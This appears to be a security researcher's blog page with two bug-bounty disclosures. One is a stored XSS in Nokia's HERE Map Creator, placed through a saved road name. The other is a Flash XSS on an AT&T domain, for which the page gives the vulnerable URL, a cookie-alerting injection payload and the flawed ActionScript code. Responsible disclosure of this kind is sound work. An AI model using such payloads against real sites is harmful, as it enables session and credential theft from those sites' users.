Francisco Correa Security.log

 Here.com, is a Nokia business unit that brings together Nokia's mapping and location assets under one brand. The technology of Here is based on a cloud-computing model, in which location data and services are stored on remote servers so that users have access to it regardless of which device they use.  HERE Map Creator is a service launched by Nokia in November 2012 to allow users to map their neighborhood. With this bug I could SAVE a Road name with a payload on the map. Any user that try on re-edit the street name will get this XSS. I report a similar bug to Waza.com a few months ago .  Nokia Reponse:   Thanks to Nokia for starting this bug bounty program .

I found a Flash XSS at AT&T main domain where an attacker could stealing credentials of users. Vuln URL: http://www.att.com/media/en_US/scripts/JSAM/JSAM_VideoPlayer.swf?completeHandler= JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}// &source=https://www.wireless.att.com/home/video_progressive/video_marquees/B2CNDA-24-emerald-hp-marquee-bkd.mp4 Payload: JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}// Flash Vuln Code: public function videoPlayer_completeHandler(_arg1:VideoEvent):void{ if (ExternalInterface.available){ ExternalInterface.call(completeHandler, ExternalInterface.objectID); } else { trace("JSAM_VideoPlayer cannot call completeHandler because ExternalInterface is not available."); }; } Proof: After 2 months AT&T Response: I hope to be on the top 10 Award :)